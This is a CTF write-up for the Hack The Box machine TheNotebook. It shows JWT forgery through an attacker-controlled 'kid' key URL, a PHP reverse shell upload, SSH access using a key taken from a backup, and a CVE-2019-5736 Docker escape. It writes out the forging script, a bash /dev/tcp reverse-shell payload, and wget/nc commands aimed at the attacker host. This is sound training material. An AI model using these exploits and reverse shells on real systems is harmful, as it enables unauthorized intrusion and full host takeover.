ctfwriteup.com
House of NotePwnie Island
Search…
Hack The Box
AD
Windows
Linux
Safe (Easy)
Delivery (Easy)
TheNotebook (Medium)
Brainfuck (Insane)
TCM Academy
TCM Windows Privilege Escalation Course
TCM Linux Privilege Escalation Course
Game Hacking
Pwnie Island
Pwn
pwn.college
pwnable.kr
pwnable.tw
ROP Emporium
Jarvis OJ Pwn Xman Series
Crypto
Jarvis OJ Crypto RSA Series
picoCTF
picoCTF 2020 Mini-Competition
picoCTF 2021
picoMini by redpwn
redpwnCTF
redpwnCTF 2021
Powered By GitBook
TheNotebook (Medium)

Summary

There is a notebook web app hosted on port 80. It allows us to register and log in as user. The web app assigns us a JWT for authorization, and we are able to forge a new JWT with valid digital signature to escalate privilege to admin.
In the admin panel, we can upload notes and view notes. Here we upload a PHP reverse shell payload and get a shell as www-data.
In the backup files, we find a SSH private key which allows us to SSH in as Noah. Here we get the user shell.
In the privilege escalation phase, we get a root shell easily but it is inside a Docker container. In order to escape the Docker container, we use CVE-2019-5736.

IP

  • RHOST: 10.129.148.151
  • LHOST: 10.10.14.60

Nmap

Nmap
Investigate port 80.

Admin Panel: JWT Forgery

Port 80 hosts a notebook Web app which allows us to register and log in. Register a user hacker:hacker and investigate the cookie. The cookie is:
auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6ImhhY2tlciIsImVtYWlsIjoiaGFja2VyQGhhY2tlci5jb20iLCJhZG1pbl9jYXAiOjB9.aezYVeKR_Oc8LBGFRicNrspdiYNziAYh5ZN62t4sOlK_CgWI525IJj0ORF9FffKGYYzaZhP1j3buDT5HQcH6dom4cj8laFAUEtsLUQYqjUk4GH6RnXsFEwlGSioX2_NPDvTNkRqZuDe1z4ycLOhgfgQTeFLKfEqrbHiLIdyg7aHvSjdifOS8JeN0HVQtR7JebIqF4J0hY3Nhvurr_CCO7Piu2kjLNLX7UFeLafqFW2cDVKN8P12YyjGcb_ov_4psI8QTVkyI2SbbG72iUUHjiJKr9OxvBzmjRAplVW1MG7iTXqWISEvyyXDLwzowXfNU8iYksAs7-RNY-s1_I9bOxzAD7LRlpzDEvLRqfo54jvufnF2mvVhWc3XgkH1rNh11zpEms7j_IzO8SLftFJJ8GUgyH2YuTXrngdD4uSO9kJSOy2CtPVkKdtCkhn9pRi0GgmPfVjGbQixCdDXZWklQ9FVci5vsBz8phtFSVg-vqqzGNIrv9RsSwTWs8euixgICU4InGBnEiNJrf1PR9e4oGCWtAzS0dfKzNd3IKQQvAlD3WptyrdfMSF1YJjDnSKpBQvqz0mpJsi5Y4SR67WM0cyEDYCjsJa_I_Hq8NOSYpQmSpW8sCjzWLUHRGfL9jFFQtMgiUwlVo6gZzgSHZ5SWeS_CcfvUBpdyjZraVYLRAp0
Try decode it on jwt.io:
JWT
It turns out that the token is a JWT in RS256 mode. Since the server verifies the public key by looking at the "kid" field in the JWT header without any authentication, what we can do here is generating a RSA public/private key pair in order to forge a new JWT with admin_cap=1 with a valid digital signature. Here is a bash script for generating such RSA key pair for RS256:
#!/bin/bash
​
# RSA256
ssh-keygen -t rsa -b 2048 -m PEM -f privKey.key
# Don't add passphrase
openssl rsa -in privKey.key -pubout -outform PEM -out privKey.key.pub
Forging a new JWT with admin_cap=1 together with the key pair we just generated:
#!/usr/bin/env python3
import jwt
​
# The library used is pyjwt
# Install: sudo pip3 install pyjwt
​
with open("privKey.key", "r") as f:
key = f.read()
headers = {"typ": "JWT", "alg": "RS256", "kid": "http://10.10.14.60:7070/privKey.key.pub"}
payload = {"username": "hacker", "email": "[email protected]", "admin_cap": 1}
print(jwt.encode(payload, headers=headers, key=key, algorithm="RS256").decode())
Remember that in digital signature scheme, we use private key for signing and public key for verifying. The forged JWT is:
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly8xMC4xMC4xNC42MDo3MDcwL3ByaXZLZXkua2V5LnB1YiJ9.eyJ1c2VybmFtZSI6ImhhY2tlciIsImVtYWlsIjoiaGFja2VyQGhhY2tlci5jb20iLCJhZG1pbl9jYXAiOjF9.L02EUKxvbMSoGtQhX1FPMMDxi9qF6JyoLudKKG-nEgvrdpblF8_C3d8CfM9_mE13BTt6ws_EqBNl3znlxPtged_HioLWm2SDGioS103NS8ySlSkjmtqp7K046aYZniGQe09bUDatbaw4Gc7yutHB_VZMmb1DMdd50FtFEAHRxC51CZ88Q9u57e1fNAmtNnrxTl8RA-sLYrGaFQngDKgd2pj-IyP_ERDbEo7Exi6wkOnhiCCff8EcruvjsVoUEeja7qJ6aIuNbHE-mFnzLtRPFA3SpgbisHqouWnhK5KNjdi4lfs6WtcGnlE5qvFlOTb_s9oPTdwUO5U5g4IpBC3mNA
Host the private key on port 7070 using updog:
updog -p 7070
Modify the auth cookie and refresh, and we have access to the admin panel:
Admin panel access

www-data Shell: PHP Reverse Shell

In the admin panel, we are able to upload note and then view note. This is a typical file upload vulnerability scenario where we can upload a PHP reverse shell payload. A go-to choice for PHP reverse shell payload is /usr/share/webshells/php/php-reverse-shell.php.
Start a pwncat listener at port 443:
sudo pwncat :443
Upload the PHP reverse shell payload and trigger it. Now we get a shell as www-data:
www-data shell

User Shell: SSH Key in Backup File

In one of the notes in the admin panel, there is a hint saying "backups are scheduled":
Hint
In /var/backups, there is a backup file named home.tar.gz. Download it to our attack machine. In turns out that this backup file contains the backup of the home directory. There is a user noah and we got the SSH private key. SSH in:
ssh -i id_rsa [email protected]
Now we get a user shell as Noah:
User shell

Privilege Escalation: CVE-2019-5736 Docker Escape

sudo -l:
sudo -l
We are able to execute /usr/bin/docker exec -it webapp-dev01* as root. Spawn a (limited) root shell:
sudo /usr/bin/docker exec -it webapp-dev01 bash
Although we get a "root" shell, we are actually inside a Docker container. We still have to escape this container in order to read /root/root.txt. Here we are going to use CVE-2019-5736 to escape the Docker contain. HackTricks has a writeup on this CVE:
Docker Basics & Breakout
HackTricks
Docker Breakout - HackTricks
Modify the "payload" part of the script:
// This is the line of shell commands that will execute on the host
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.60/443 0>&1"
Compile the Go source code and transfer it to the victim machine:
# Attack machine (HTTP server)
$ go build main.go
$ updog -p 1337
# Attack machine (Listener)
$ sudo nc -nvlp 443
# Victim machine (the root shell in the Docker container)
$ wget http://10.10.14.60:1337/main
$ chmod +x main
$ ./main
In another SSH session, trigger the exploit by executing modified /bin/sh binary. You have to do this step fast:
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
Caution: This step is tricky. When you see "[+] Overwritten /bin/sh successfully", you should execute the command sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh immediately. Otherwise it will be too late and you won't get the reverse shell.
Now we get a root shell:
root shell
Previous
Delivery (Easy)
Next
Brainfuck (Insane)
Last modified 30d ago
Copy link
Outline
Summary
IP
Nmap
Admin Panel: JWT Forgery
www-data Shell: PHP Reverse Shell
User Shell: SSH Key in Backup File
Privilege Escalation: CVE-2019-5736 Docker Escape